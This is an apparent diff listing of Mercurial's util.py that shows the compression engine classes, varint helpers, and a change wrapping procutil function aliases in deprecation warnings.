3304 compression format so decompression can be routed to this engine.
3305 This header should be identified by the ``revlogheader()`` return
3305 This header should be identified by the ``revlogheader()`` return
3306 value.
3306 value.
3307
3307
3308 The object has a ``decompress(data)`` method that decompresses
3308 The object has a ``decompress(data)`` method that decompresses
3309 data. The method will only be called if ``data`` begins with
3309 data. The method will only be called if ``data`` begins with
3310 ``revlogheader()``. The method should return the raw, uncompressed
3310 ``revlogheader()``. The method should return the raw, uncompressed
3311 data or raise a ``RevlogError``.
3311 data or raise a ``RevlogError``.
3312
3312
3313 The object is reusable but is not thread safe.
3313 The object is reusable but is not thread safe.
3314 """
3314 """
3315 raise NotImplementedError()
3315 raise NotImplementedError()
3316
3316
3317 class _zlibengine(compressionengine):
3317 class _zlibengine(compressionengine):
3318 def name(self):
3318 def name(self):
3319 return 'zlib'
3319 return 'zlib'
3320
3320
3321 def bundletype(self):
3321 def bundletype(self):
3322 """zlib compression using the DEFLATE algorithm.
3322 """zlib compression using the DEFLATE algorithm.
3323
3323
3324 All Mercurial clients should support this format. The compression
3324 All Mercurial clients should support this format. The compression
3325 algorithm strikes a reasonable balance between compression ratio
3325 algorithm strikes a reasonable balance between compression ratio
3326 and size.
3326 and size.
3327 """
3327 """
3328 return 'gzip', 'GZ'
3328 return 'gzip', 'GZ'
3329
3329
3330 def wireprotosupport(self):
3330 def wireprotosupport(self):
3331 return compewireprotosupport('zlib', 20, 20)
3331 return compewireprotosupport('zlib', 20, 20)
3332
3332
3333 def revlogheader(self):
3333 def revlogheader(self):
3334 return 'x'
3334 return 'x'
3335
3335
3336 def compressstream(self, it, opts=None):
3336 def compressstream(self, it, opts=None):
3337 opts = opts or {}
3337 opts = opts or {}
3338
3338
3339 z = zlib.compressobj(opts.get('level', -1))
3339 z = zlib.compressobj(opts.get('level', -1))
3340 for chunk in it:
3340 for chunk in it:
3341 data = z.compress(chunk)
3341 data = z.compress(chunk)
3342 # Not all calls to compress emit data. It is cheaper to inspect
3342 # Not all calls to compress emit data. It is cheaper to inspect
3343 # here than to feed empty chunks through generator.
3343 # here than to feed empty chunks through generator.
3344 if data:
3344 if data:
3345 yield data
3345 yield data
3346
3346
3347 yield z.flush()
3347 yield z.flush()
3348
3348
3349 def decompressorreader(self, fh):
3349 def decompressorreader(self, fh):
3350 def gen():
3350 def gen():
3351 d = zlib.decompressobj()
3351 d = zlib.decompressobj()
3352 for chunk in filechunkiter(fh):
3352 for chunk in filechunkiter(fh):
3353 while chunk:
3353 while chunk:
3354 # Limit output size to limit memory.
3354 # Limit output size to limit memory.
3355 yield d.decompress(chunk, 2 ** 18)
3355 yield d.decompress(chunk, 2 ** 18)
3356 chunk = d.unconsumed_tail
3356 chunk = d.unconsumed_tail
3357
3357
3358 return chunkbuffer(gen())
3358 return chunkbuffer(gen())
3359
3359
3360 class zlibrevlogcompressor(object):
3360 class zlibrevlogcompressor(object):
3361 def compress(self, data):
3361 def compress(self, data):
3362 insize = len(data)
3362 insize = len(data)
3363 # Caller handles empty input case.
3363 # Caller handles empty input case.
3364 assert insize > 0
3364 assert insize > 0
3365
3365
3366 if insize < 44:
3366 if insize < 44:
3367 return None
3367 return None
3368
3368
3369 elif insize <= 1000000:
3369 elif insize <= 1000000:
3370 compressed = zlib.compress(data)
3370 compressed = zlib.compress(data)
3371 if len(compressed) < insize:
3371 if len(compressed) < insize:
3372 return compressed
3372 return compressed
3373 return None
3373 return None
3374
3374
3375 # zlib makes an internal copy of the input buffer, doubling
3375 # zlib makes an internal copy of the input buffer, doubling
3376 # memory usage for large inputs. So do streaming compression
3376 # memory usage for large inputs. So do streaming compression
3377 # on large inputs.
3377 # on large inputs.
3378 else:
3378 else:
3379 z = zlib.compressobj()
3379 z = zlib.compressobj()
3380 parts = []
3380 parts = []
3381 pos = 0
3381 pos = 0
3382 while pos < insize:
3382 while pos < insize:
3383 pos2 = pos + 2**20
3383 pos2 = pos + 2**20
3384 parts.append(z.compress(data[pos:pos2]))
3384 parts.append(z.compress(data[pos:pos2]))
3385 pos = pos2
3385 pos = pos2
3386 parts.append(z.flush())
3386 parts.append(z.flush())
3387
3387
3388 if sum(map(len, parts)) < insize:
3388 if sum(map(len, parts)) < insize:
3389 return ''.join(parts)
3389 return ''.join(parts)
3390 return None
3390 return None
3391
3391
3392 def decompress(self, data):
3392 def decompress(self, data):
3393 try:
3393 try:
3394 return zlib.decompress(data)
3394 return zlib.decompress(data)
3395 except zlib.error as e:
3395 except zlib.error as e:
3396 raise error.RevlogError(_('revlog decompress error: %s') %
3396 raise error.RevlogError(_('revlog decompress error: %s') %
3397 stringutil.forcebytestr(e))
3397 stringutil.forcebytestr(e))
3398
3398
3399 def revlogcompressor(self, opts=None):
3399 def revlogcompressor(self, opts=None):
3400 return self.zlibrevlogcompressor()
3400 return self.zlibrevlogcompressor()
3401
3401
3402 compengines.register(_zlibengine())
3402 compengines.register(_zlibengine())
3403
3403
3404 class _bz2engine(compressionengine):
3404 class _bz2engine(compressionengine):
3405 def name(self):
3405 def name(self):
3406 return 'bz2'
3406 return 'bz2'
3407
3407
3408 def bundletype(self):
3408 def bundletype(self):
3409 """An algorithm that produces smaller bundles than ``gzip``.
3409 """An algorithm that produces smaller bundles than ``gzip``.
3410
3410
3411 All Mercurial clients should support this format.
3411 All Mercurial clients should support this format.
3412
3412
3413 This engine will likely produce smaller bundles than ``gzip`` but
3413 This engine will likely produce smaller bundles than ``gzip`` but
3414 will be significantly slower, both during compression and
3414 will be significantly slower, both during compression and
3415 decompression.
3415 decompression.
3416
3416
3417 If available, the ``zstd`` engine can yield similar or better
3417 If available, the ``zstd`` engine can yield similar or better
3418 compression at much higher speeds.
3418 compression at much higher speeds.
3419 """
3419 """
3420 return 'bzip2', 'BZ'
3420 return 'bzip2', 'BZ'
3421
3421
3422 # We declare a protocol name but don't advertise by default because
3422 # We declare a protocol name but don't advertise by default because
3423 # it is slow.
3423 # it is slow.
3424 def wireprotosupport(self):
3424 def wireprotosupport(self):
3425 return compewireprotosupport('bzip2', 0, 0)
3425 return compewireprotosupport('bzip2', 0, 0)
3426
3426
3427 def compressstream(self, it, opts=None):
3427 def compressstream(self, it, opts=None):
3428 opts = opts or {}
3428 opts = opts or {}
3429 z = bz2.BZ2Compressor(opts.get('level', 9))
3429 z = bz2.BZ2Compressor(opts.get('level', 9))
3430 for chunk in it:
3430 for chunk in it:
3431 data = z.compress(chunk)
3431 data = z.compress(chunk)
3432 if data:
3432 if data:
3433 yield data
3433 yield data
3434
3434
3435 yield z.flush()
3435 yield z.flush()
3436
3436
3437 def decompressorreader(self, fh):
3437 def decompressorreader(self, fh):
3438 def gen():
3438 def gen():
3439 d = bz2.BZ2Decompressor()
3439 d = bz2.BZ2Decompressor()
3440 for chunk in filechunkiter(fh):
3440 for chunk in filechunkiter(fh):
3441 yield d.decompress(chunk)
3441 yield d.decompress(chunk)
3442
3442
3443 return chunkbuffer(gen())
3443 return chunkbuffer(gen())
3444
3444
3445 compengines.register(_bz2engine())
3445 compengines.register(_bz2engine())
3446
3446
3447 class _truncatedbz2engine(compressionengine):
3447 class _truncatedbz2engine(compressionengine):
3448 def name(self):
3448 def name(self):
3449 return 'bz2truncated'
3449 return 'bz2truncated'
3450
3450
3451 def bundletype(self):
3451 def bundletype(self):
3452 return None, '_truncatedBZ'
3452 return None, '_truncatedBZ'
3453
3453
3454 # We don't implement compressstream because it is hackily handled elsewhere.
3454 # We don't implement compressstream because it is hackily handled elsewhere.
3455
3455
3456 def decompressorreader(self, fh):
3456 def decompressorreader(self, fh):
3457 def gen():
3457 def gen():
3458 # The input stream doesn't have the 'BZ' header. So add it back.
3458 # The input stream doesn't have the 'BZ' header. So add it back.
3459 d = bz2.BZ2Decompressor()
3459 d = bz2.BZ2Decompressor()
3460 d.decompress('BZ')
3460 d.decompress('BZ')
3461 for chunk in filechunkiter(fh):
3461 for chunk in filechunkiter(fh):
3462 yield d.decompress(chunk)
3462 yield d.decompress(chunk)
3463
3463
3464 return chunkbuffer(gen())
3464 return chunkbuffer(gen())
3465
3465
3466 compengines.register(_truncatedbz2engine())
3466 compengines.register(_truncatedbz2engine())
3467
3467
3468 class _noopengine(compressionengine):
3468 class _noopengine(compressionengine):
3469 def name(self):
3469 def name(self):
3470 return 'none'
3470 return 'none'
3471
3471
3472 def bundletype(self):
3472 def bundletype(self):
3473 """No compression is performed.
3473 """No compression is performed.
3474
3474
3475 Use this compression engine to explicitly disable compression.
3475 Use this compression engine to explicitly disable compression.
3476 """
3476 """
3477 return 'none', 'UN'
3477 return 'none', 'UN'
3478
3478
3479 # Clients always support uncompressed payloads. Servers don't because
3479 # Clients always support uncompressed payloads. Servers don't because
3480 # unless you are on a fast network, uncompressed payloads can easily
3480 # unless you are on a fast network, uncompressed payloads can easily
3481 # saturate your network pipe.
3481 # saturate your network pipe.
3482 def wireprotosupport(self):
3482 def wireprotosupport(self):
3483 return compewireprotosupport('none', 0, 10)
3483 return compewireprotosupport('none', 0, 10)
3484
3484
3485 # We don't implement revlogheader because it is handled specially
3485 # We don't implement revlogheader because it is handled specially
3486 # in the revlog class.
3486 # in the revlog class.
3487
3487
3488 def compressstream(self, it, opts=None):
3488 def compressstream(self, it, opts=None):
3489 return it
3489 return it
3490
3490
3491 def decompressorreader(self, fh):
3491 def decompressorreader(self, fh):
3492 return fh
3492 return fh
3493
3493
3494 class nooprevlogcompressor(object):
3494 class nooprevlogcompressor(object):
3495 def compress(self, data):
3495 def compress(self, data):
3496 return None
3496 return None
3497
3497
3498 def revlogcompressor(self, opts=None):
3498 def revlogcompressor(self, opts=None):
3499 return self.nooprevlogcompressor()
3499 return self.nooprevlogcompressor()
3500
3500
3501 compengines.register(_noopengine())
3501 compengines.register(_noopengine())
3502
3502
3503 class _zstdengine(compressionengine):
3503 class _zstdengine(compressionengine):
3504 def name(self):
3504 def name(self):
3505 return 'zstd'
3505 return 'zstd'
3506
3506
3507 @propertycache
3507 @propertycache
3508 def _module(self):
3508 def _module(self):
3509 # Not all installs have the zstd module available. So defer importing
3509 # Not all installs have the zstd module available. So defer importing
3510 # until first access.
3510 # until first access.
3511 try:
3511 try:
3512 from . import zstd
3512 from . import zstd
3513 # Force delayed import.
3513 # Force delayed import.
3514 zstd.__version__
3514 zstd.__version__
3515 return zstd
3515 return zstd
3516 except ImportError:
3516 except ImportError:
3517 return None
3517 return None
3518
3518
3519 def available(self):
3519 def available(self):
3520 return bool(self._module)
3520 return bool(self._module)
3521
3521
3522 def bundletype(self):
3522 def bundletype(self):
3523 """A modern compression algorithm that is fast and highly flexible.
3523 """A modern compression algorithm that is fast and highly flexible.
3524
3524
3525 Only supported by Mercurial 4.1 and newer clients.
3525 Only supported by Mercurial 4.1 and newer clients.
3526
3526
3527 With the default settings, zstd compression is both faster and yields
3527 With the default settings, zstd compression is both faster and yields
3528 better compression than ``gzip``. It also frequently yields better
3528 better compression than ``gzip``. It also frequently yields better
3529 compression than ``bzip2`` while operating at much higher speeds.
3529 compression than ``bzip2`` while operating at much higher speeds.
3530
3530
3531 If this engine is available and backwards compatibility is not a
3531 If this engine is available and backwards compatibility is not a
3532 concern, it is likely the best available engine.
3532 concern, it is likely the best available engine.
3533 """
3533 """
3534 return 'zstd', 'ZS'
3534 return 'zstd', 'ZS'
3535
3535
3536 def wireprotosupport(self):
3536 def wireprotosupport(self):
3537 return compewireprotosupport('zstd', 50, 50)
3537 return compewireprotosupport('zstd', 50, 50)
3538
3538
3539 def revlogheader(self):
3539 def revlogheader(self):
3540 return '\x28'
3540 return '\x28'
3541
3541
3542 def compressstream(self, it, opts=None):
3542 def compressstream(self, it, opts=None):
3543 opts = opts or {}
3543 opts = opts or {}
3544 # zstd level 3 is almost always significantly faster than zlib
3544 # zstd level 3 is almost always significantly faster than zlib
3545 # while providing no worse compression. It strikes a good balance
3545 # while providing no worse compression. It strikes a good balance
3546 # between speed and compression.
3546 # between speed and compression.
3547 level = opts.get('level', 3)
3547 level = opts.get('level', 3)
3548
3548
3549 zstd = self._module
3549 zstd = self._module
3550 z = zstd.ZstdCompressor(level=level).compressobj()
3550 z = zstd.ZstdCompressor(level=level).compressobj()
3551 for chunk in it:
3551 for chunk in it:
3552 data = z.compress(chunk)
3552 data = z.compress(chunk)
3553 if data:
3553 if data:
3554 yield data
3554 yield data
3555
3555
3556 yield z.flush()
3556 yield z.flush()
3557
3557
3558 def decompressorreader(self, fh):
3558 def decompressorreader(self, fh):
3559 zstd = self._module
3559 zstd = self._module
3560 dctx = zstd.ZstdDecompressor()
3560 dctx = zstd.ZstdDecompressor()
3561 return chunkbuffer(dctx.read_from(fh))
3561 return chunkbuffer(dctx.read_from(fh))
3562
3562
3563 class zstdrevlogcompressor(object):
3563 class zstdrevlogcompressor(object):
3564 def __init__(self, zstd, level=3):
3564 def __init__(self, zstd, level=3):
3565 # Writing the content size adds a few bytes to the output. However,
3565 # Writing the content size adds a few bytes to the output. However,
3566 # it allows decompression to be more optimal since we can
3566 # it allows decompression to be more optimal since we can
3567 # pre-allocate a buffer to hold the result.
3567 # pre-allocate a buffer to hold the result.
3568 self._cctx = zstd.ZstdCompressor(level=level,
3568 self._cctx = zstd.ZstdCompressor(level=level,
3569 write_content_size=True)
3569 write_content_size=True)
3570 self._dctx = zstd.ZstdDecompressor()
3570 self._dctx = zstd.ZstdDecompressor()
3571 self._compinsize = zstd.COMPRESSION_RECOMMENDED_INPUT_SIZE
3571 self._compinsize = zstd.COMPRESSION_RECOMMENDED_INPUT_SIZE
3572 self._decompinsize = zstd.DECOMPRESSION_RECOMMENDED_INPUT_SIZE
3572 self._decompinsize = zstd.DECOMPRESSION_RECOMMENDED_INPUT_SIZE
3573
3573
3574 def compress(self, data):
3574 def compress(self, data):
3575 insize = len(data)
3575 insize = len(data)
3576 # Caller handles empty input case.
3576 # Caller handles empty input case.
3577 assert insize > 0
3577 assert insize > 0
3578
3578
3579 if insize < 50:
3579 if insize < 50:
3580 return None
3580 return None
3581
3581
3582 elif insize <= 1000000:
3582 elif insize <= 1000000:
3583 compressed = self._cctx.compress(data)
3583 compressed = self._cctx.compress(data)
3584 if len(compressed) < insize:
3584 if len(compressed) < insize:
3585 return compressed
3585 return compressed
3586 return None
3586 return None
3587 else:
3587 else:
3588 z = self._cctx.compressobj()
3588 z = self._cctx.compressobj()
3589 chunks = []
3589 chunks = []
3590 pos = 0
3590 pos = 0
3591 while pos < insize:
3591 while pos < insize:
3592 pos2 = pos + self._compinsize
3592 pos2 = pos + self._compinsize
3593 chunk = z.compress(data[pos:pos2])
3593 chunk = z.compress(data[pos:pos2])
3594 if chunk:
3594 if chunk:
3595 chunks.append(chunk)
3595 chunks.append(chunk)
3596 pos = pos2
3596 pos = pos2
3597 chunks.append(z.flush())
3597 chunks.append(z.flush())
3598
3598
3599 if sum(map(len, chunks)) < insize:
3599 if sum(map(len, chunks)) < insize:
3600 return ''.join(chunks)
3600 return ''.join(chunks)
3601 return None
3601 return None
3602
3602
3603 def decompress(self, data):
3603 def decompress(self, data):
3604 insize = len(data)
3604 insize = len(data)
3605
3605
3606 try:
3606 try:
3607 # This was measured to be faster than other streaming
3607 # This was measured to be faster than other streaming
3608 # decompressors.
3608 # decompressors.
3609 dobj = self._dctx.decompressobj()
3609 dobj = self._dctx.decompressobj()
3610 chunks = []
3610 chunks = []
3611 pos = 0
3611 pos = 0
3612 while pos < insize:
3612 while pos < insize:
3613 pos2 = pos + self._decompinsize
3613 pos2 = pos + self._decompinsize
3614 chunk = dobj.decompress(data[pos:pos2])
3614 chunk = dobj.decompress(data[pos:pos2])
3615 if chunk:
3615 if chunk:
3616 chunks.append(chunk)
3616 chunks.append(chunk)
3617 pos = pos2
3617 pos = pos2
3618 # Frame should be exhausted, so no finish() API.
3618 # Frame should be exhausted, so no finish() API.
3619
3619
3620 return ''.join(chunks)
3620 return ''.join(chunks)
3621 except Exception as e:
3621 except Exception as e:
3622 raise error.RevlogError(_('revlog decompress error: %s') %
3622 raise error.RevlogError(_('revlog decompress error: %s') %
3623 stringutil.forcebytestr(e))
3623 stringutil.forcebytestr(e))
3624
3624
3625 def revlogcompressor(self, opts=None):
3625 def revlogcompressor(self, opts=None):
3626 opts = opts or {}
3626 opts = opts or {}
3627 return self.zstdrevlogcompressor(self._module,
3627 return self.zstdrevlogcompressor(self._module,
3628 level=opts.get('level', 3))
3628 level=opts.get('level', 3))
3629
3629
3630 compengines.register(_zstdengine())
3630 compengines.register(_zstdengine())
3631
3631
3632 def bundlecompressiontopics():
3632 def bundlecompressiontopics():
3633 """Obtains a list of available bundle compressions for use in help."""
3633 """Obtains a list of available bundle compressions for use in help."""
3634 # help.makeitemsdocs() expects a dict of names to items with a .__doc__.
3634 # help.makeitemsdocs() expects a dict of names to items with a .__doc__.
3635 items = {}
3635 items = {}
3636
3636
3637 # We need to format the docstring. So use a dummy object/type to hold it
3637 # We need to format the docstring. So use a dummy object/type to hold it
3638 # rather than mutating the original.
3638 # rather than mutating the original.
3639 class docobject(object):
3639 class docobject(object):
3640 pass
3640 pass
3641
3641
3642 for name in compengines:
3642 for name in compengines:
3643 engine = compengines[name]
3643 engine = compengines[name]
3644
3644
3645 if not engine.available():
3645 if not engine.available():
3646 continue
3646 continue
3647
3647
3648 bt = engine.bundletype()
3648 bt = engine.bundletype()
3649 if not bt or not bt[0]:
3649 if not bt or not bt[0]:
3650 continue
3650 continue
3651
3651
3652 doc = pycompat.sysstr('``%s``\n %s') % (
3652 doc = pycompat.sysstr('``%s``\n %s') % (
3653 bt[0], engine.bundletype.__doc__)
3653 bt[0], engine.bundletype.__doc__)
3654
3654
3655 value = docobject()
3655 value = docobject()
3656 value.__doc__ = doc
3656 value.__doc__ = doc
3657 value._origdoc = engine.bundletype.__doc__
3657 value._origdoc = engine.bundletype.__doc__
3658 value._origfunc = engine.bundletype
3658 value._origfunc = engine.bundletype
3659
3659
3660 items[bt[0]] = value
3660 items[bt[0]] = value
3661
3661
3662 return items
3662 return items
3663
3663
3664 i18nfunctions = bundlecompressiontopics().values()
3664 i18nfunctions = bundlecompressiontopics().values()
3665
3665
3666 # convenient shortcut
3666 # convenient shortcut
3667 dst = debugstacktrace
3667 dst = debugstacktrace
3668
3668
3669 def safename(f, tag, ctx, others=None):
3669 def safename(f, tag, ctx, others=None):
3670 """
3670 """
3671 Generate a name that it is safe to rename f to in the given context.
3671 Generate a name that it is safe to rename f to in the given context.
3672
3672
3673 f: filename to rename
3673 f: filename to rename
3674 tag: a string tag that will be included in the new name
3674 tag: a string tag that will be included in the new name
3675 ctx: a context, in which the new name must not exist
3675 ctx: a context, in which the new name must not exist
3676 others: a set of other filenames that the new name must not be in
3676 others: a set of other filenames that the new name must not be in
3677
3677
3678 Returns a file name of the form oldname~tag[~number] which does not exist
3678 Returns a file name of the form oldname~tag[~number] which does not exist
3679 in the provided context and is not in the set of other names.
3679 in the provided context and is not in the set of other names.
3680 """
3680 """
3681 if others is None:
3681 if others is None:
3682 others = set()
3682 others = set()
3683
3683
3684 fn = '%s~%s' % (f, tag)
3684 fn = '%s~%s' % (f, tag)
3685 if fn not in ctx and fn not in others:
3685 if fn not in ctx and fn not in others:
3686 return fn
3686 return fn
3687 for n in itertools.count(1):
3687 for n in itertools.count(1):
3688 fn = '%s~%s~%s' % (f, tag, n)
3688 fn = '%s~%s~%s' % (f, tag, n)
3689 if fn not in ctx and fn not in others:
3689 if fn not in ctx and fn not in others:
3690 return fn
3690 return fn
3691
3691
3692 def readexactly(stream, n):
3692 def readexactly(stream, n):
3693 '''read n bytes from stream.read and abort if less was available'''
3693 '''read n bytes from stream.read and abort if less was available'''
3694 s = stream.read(n)
3694 s = stream.read(n)
3695 if len(s) < n:
3695 if len(s) < n:
3696 raise error.Abort(_("stream ended unexpectedly"
3696 raise error.Abort(_("stream ended unexpectedly"
3697 " (got %d bytes, expected %d)")
3697 " (got %d bytes, expected %d)")
3698 % (len(s), n))
3698 % (len(s), n))
3699 return s
3699 return s
3700
3700
3701 def uvarintencode(value):
3701 def uvarintencode(value):
3702 """Encode an unsigned integer value to a varint.
3702 """Encode an unsigned integer value to a varint.
3703
3703
3704 A varint is a variable length integer of 1 or more bytes. Each byte
3704 A varint is a variable length integer of 1 or more bytes. Each byte
3705 except the last has the most significant bit set. The lower 7 bits of
3705 except the last has the most significant bit set. The lower 7 bits of
3706 each byte store the 2's complement representation, least significant group
3706 each byte store the 2's complement representation, least significant group
3707 first.
3707 first.
3708
3708
3709 >>> uvarintencode(0)
3709 >>> uvarintencode(0)
3710 '\\x00'
3710 '\\x00'
3711 >>> uvarintencode(1)
3711 >>> uvarintencode(1)
3712 '\\x01'
3712 '\\x01'
3713 >>> uvarintencode(127)
3713 >>> uvarintencode(127)
3714 '\\x7f'
3714 '\\x7f'
3715 >>> uvarintencode(1337)
3715 >>> uvarintencode(1337)
3716 '\\xb9\\n'
3716 '\\xb9\\n'
3717 >>> uvarintencode(65536)
3717 >>> uvarintencode(65536)
3718 '\\x80\\x80\\x04'
3718 '\\x80\\x80\\x04'
3719 >>> uvarintencode(-1)
3719 >>> uvarintencode(-1)
3720 Traceback (most recent call last):
3720 Traceback (most recent call last):
3721 ...
3721 ...
3722 ProgrammingError: negative value for uvarint: -1
3722 ProgrammingError: negative value for uvarint: -1
3723 """
3723 """
3724 if value < 0:
3724 if value < 0:
3725 raise error.ProgrammingError('negative value for uvarint: %d'
3725 raise error.ProgrammingError('negative value for uvarint: %d'
3726 % value)
3726 % value)
3727 bits = value & 0x7f
3727 bits = value & 0x7f
3728 value >>= 7
3728 value >>= 7
3729 bytes = []
3729 bytes = []
3730 while value:
3730 while value:
3731 bytes.append(pycompat.bytechr(0x80 | bits))
3731 bytes.append(pycompat.bytechr(0x80 | bits))
3732 bits = value & 0x7f
3732 bits = value & 0x7f
3733 value >>= 7
3733 value >>= 7
3734 bytes.append(pycompat.bytechr(bits))
3734 bytes.append(pycompat.bytechr(bits))
3735
3735
3736 return ''.join(bytes)
3736 return ''.join(bytes)
3737
3737
3738 def uvarintdecodestream(fh):
3738 def uvarintdecodestream(fh):
3739 """Decode an unsigned variable length integer from a stream.
3739 """Decode an unsigned variable length integer from a stream.
3740
3740
3741 The passed argument is anything that has a ``.read(N)`` method.
3741 The passed argument is anything that has a ``.read(N)`` method.
3742
3742
3743 >>> try:
3743 >>> try:
3744 ... from StringIO import StringIO as BytesIO
3744 ... from StringIO import StringIO as BytesIO
3745 ... except ImportError:
3745 ... except ImportError:
3746 ... from io import BytesIO
3746 ... from io import BytesIO
3747 >>> uvarintdecodestream(BytesIO(b'\\x00'))
3747 >>> uvarintdecodestream(BytesIO(b'\\x00'))
3748 0
3748 0
3749 >>> uvarintdecodestream(BytesIO(b'\\x01'))
3749 >>> uvarintdecodestream(BytesIO(b'\\x01'))
3750 1
3750 1
3751 >>> uvarintdecodestream(BytesIO(b'\\x7f'))
3751 >>> uvarintdecodestream(BytesIO(b'\\x7f'))
3752 127
3752 127
3753 >>> uvarintdecodestream(BytesIO(b'\\xb9\\n'))
3753 >>> uvarintdecodestream(BytesIO(b'\\xb9\\n'))
3754 1337
3754 1337
3755 >>> uvarintdecodestream(BytesIO(b'\\x80\\x80\\x04'))
3755 >>> uvarintdecodestream(BytesIO(b'\\x80\\x80\\x04'))
3756 65536
3756 65536
3757 >>> uvarintdecodestream(BytesIO(b'\\x80'))
3757 >>> uvarintdecodestream(BytesIO(b'\\x80'))
3758 Traceback (most recent call last):
3758 Traceback (most recent call last):
3759 ...
3759 ...
3760 Abort: stream ended unexpectedly (got 0 bytes, expected 1)
3760 Abort: stream ended unexpectedly (got 0 bytes, expected 1)
3761 """
3761 """
3762 result = 0
3762 result = 0
3763 shift = 0
3763 shift = 0
3764 while True:
3764 while True:
3765 byte = ord(readexactly(fh, 1))
3765 byte = ord(readexactly(fh, 1))
3766 result |= ((byte & 0x7f) << shift)
3766 result |= ((byte & 0x7f) << shift)
3767 if not (byte & 0x80):
3767 if not (byte & 0x80):
3768 return result
3768 return result
3769 shift += 7
3769 shift += 7
3770
3770
3771 ###
3771 ###
3772 # Deprecation warnings for util.py splitting
3772 # Deprecation warnings for util.py splitting
3773 ###
3773 ###
3774
3774
3775 def _deprecatedfunc(func, version):
3775 def _deprecatedfunc(func, version, modname=None):
3776 def wrapped(*args, **kwargs):
3776 def wrapped(*args, **kwargs):
3777 fn = pycompat.sysbytes(func.__name__)
3777 fn = pycompat.sysbytes(func.__name__)
3778 mn = pycompat.sysbytes(func.__module__)[len('mercurial.'):]
3778 mn = modname or pycompat.sysbytes(func.__module__)[len('mercurial.'):]
3779 msg = "'util.%s' is deprecated, use '%s.%s'" % (fn, mn, fn)
3779 msg = "'util.%s' is deprecated, use '%s.%s'" % (fn, mn, fn)
3780 nouideprecwarn(msg, version)
3780 nouideprecwarn(msg, version)
3781 return func(*args, **kwargs)
3781 return func(*args, **kwargs)
3782 wrapped.__name__ = func.__name__
3782 wrapped.__name__ = func.__name__
3783 return wrapped
3783 return wrapped
3784
3784
3785 defaultdateformats = dateutil.defaultdateformats
3785 defaultdateformats = dateutil.defaultdateformats
3786 extendeddateformats = dateutil.extendeddateformats
3786 extendeddateformats = dateutil.extendeddateformats
3787 makedate = _deprecatedfunc(dateutil.makedate, '4.6')
3787 makedate = _deprecatedfunc(dateutil.makedate, '4.6')
3788 datestr = _deprecatedfunc(dateutil.datestr, '4.6')
3788 datestr = _deprecatedfunc(dateutil.datestr, '4.6')
3789 shortdate = _deprecatedfunc(dateutil.shortdate, '4.6')
3789 shortdate = _deprecatedfunc(dateutil.shortdate, '4.6')
3790 parsetimezone = _deprecatedfunc(dateutil.parsetimezone, '4.6')
3790 parsetimezone = _deprecatedfunc(dateutil.parsetimezone, '4.6')
3791 strdate = _deprecatedfunc(dateutil.strdate, '4.6')
3791 strdate = _deprecatedfunc(dateutil.strdate, '4.6')
3792 parsedate = _deprecatedfunc(dateutil.parsedate, '4.6')
3792 parsedate = _deprecatedfunc(dateutil.parsedate, '4.6')
3793 matchdate = _deprecatedfunc(dateutil.matchdate, '4.6')
3793 matchdate = _deprecatedfunc(dateutil.matchdate, '4.6')
3794
3794
3795 stderr = procutil.stderr
3795 stderr = procutil.stderr
3796 stdin = procutil.stdin
3796 stdin = procutil.stdin
3797 stdout = procutil.stdout
3797 stdout = procutil.stdout
3798 explainexit = procutil.explainexit
3798 explainexit = _deprecatedfunc(procutil.explainexit, '4.6',
3799 findexe = procutil.findexe
3799 modname='utils.procutil')
3800 getuser = procutil.getuser
3800 findexe = _deprecatedfunc(procutil.findexe, '4.6', modname='utils.procutil')
3801 getpid = procutil.getpid
3801 getuser = _deprecatedfunc(procutil.getuser, '4.6', modname='utils.procutil')
3802 hidewindow = procutil.hidewindow
3802 getpid = _deprecatedfunc(procutil.getpid, '4.6', modname='utils.procutil')
3803 popen = procutil.popen
3803 hidewindow = _deprecatedfunc(procutil.hidewindow, '4.6',
3804 quotecommand = procutil.quotecommand
3804 modname='utils.procutil')
3805 readpipe = procutil.readpipe
3805 popen = _deprecatedfunc(procutil.popen, '4.6', modname='utils.procutil')
3806 setbinary = procutil.setbinary
3806 quotecommand = _deprecatedfunc(procutil.quotecommand, '4.6',
3807 setsignalhandler = procutil.setsignalhandler
3807 modname='utils.procutil')
3808 shellquote = procutil.shellquote
3808 readpipe = _deprecatedfunc(procutil.readpipe, '4.6', modname='utils.procutil')
3809 shellsplit = procutil.shellsplit
3809 setbinary = _deprecatedfunc(procutil.setbinary, '4.6', modname='utils.procutil')
3810 spawndetached = procutil.spawndetached
3810 setsignalhandler = _deprecatedfunc(procutil.setsignalhandler, '4.6',
3811 sshargs = procutil.sshargs
3811 modname='utils.procutil')
3812 testpid = procutil.testpid
3812 shellquote = _deprecatedfunc(procutil.shellquote, '4.6',
3813 modname='utils.procutil')
3814 shellsplit = _deprecatedfunc(procutil.shellsplit, '4.6',
3815 modname='utils.procutil')
3816 spawndetached = _deprecatedfunc(procutil.spawndetached, '4.6',
3817 modname='utils.procutil')
3818 sshargs = _deprecatedfunc(procutil.sshargs, '4.6', modname='utils.procutil')
3819 testpid = _deprecatedfunc(procutil.testpid, '4.6', modname='utils.procutil')
3813 try:
3820 try:
3814 setprocname = procutil.setprocname
3821 setprocname = _deprecatedfunc(procutil.setprocname, '4.6',
3822 modname='utils.procutil')
3815 except AttributeError:
3823 except AttributeError:
3816 pass
3824 pass
3817 try:
3825 try:
3818 unblocksignal = procutil.unblocksignal
3826 unblocksignal = _deprecatedfunc(procutil.unblocksignal, '4.6',
3827 modname='utils.procutil')
3819 except AttributeError:
3828 except AttributeError:
3820 pass
3829 pass
3821 closefds = procutil.closefds
3830 closefds = procutil.closefds
3822 isatty = procutil.isatty
3831 isatty = _deprecatedfunc(procutil.isatty, '4.6')
3823 popen2 = procutil.popen2
3832 popen2 = _deprecatedfunc(procutil.popen2, '4.6')
3824 popen3 = procutil.popen3
3833 popen3 = _deprecatedfunc(procutil.popen3, '4.6')
3825 popen4 = procutil.popen4
3834 popen4 = _deprecatedfunc(procutil.popen4, '4.6')
3826 pipefilter = procutil.pipefilter
3835 pipefilter = _deprecatedfunc(procutil.pipefilter, '4.6')
3827 tempfilter = procutil.tempfilter
3836 tempfilter = _deprecatedfunc(procutil.tempfilter, '4.6')
3828 filter = procutil.filter
3837 filter = _deprecatedfunc(procutil.filter, '4.6')
3829 mainfrozen = procutil.mainfrozen
3838 mainfrozen = _deprecatedfunc(procutil.mainfrozen, '4.6')
3830 hgexecutable = procutil.hgexecutable
3839 hgexecutable = _deprecatedfunc(procutil.hgexecutable, '4.6')
3831 isstdin = procutil.isstdin
3840 isstdin = _deprecatedfunc(procutil.isstdin, '4.6')
3832 isstdout = procutil.isstdout
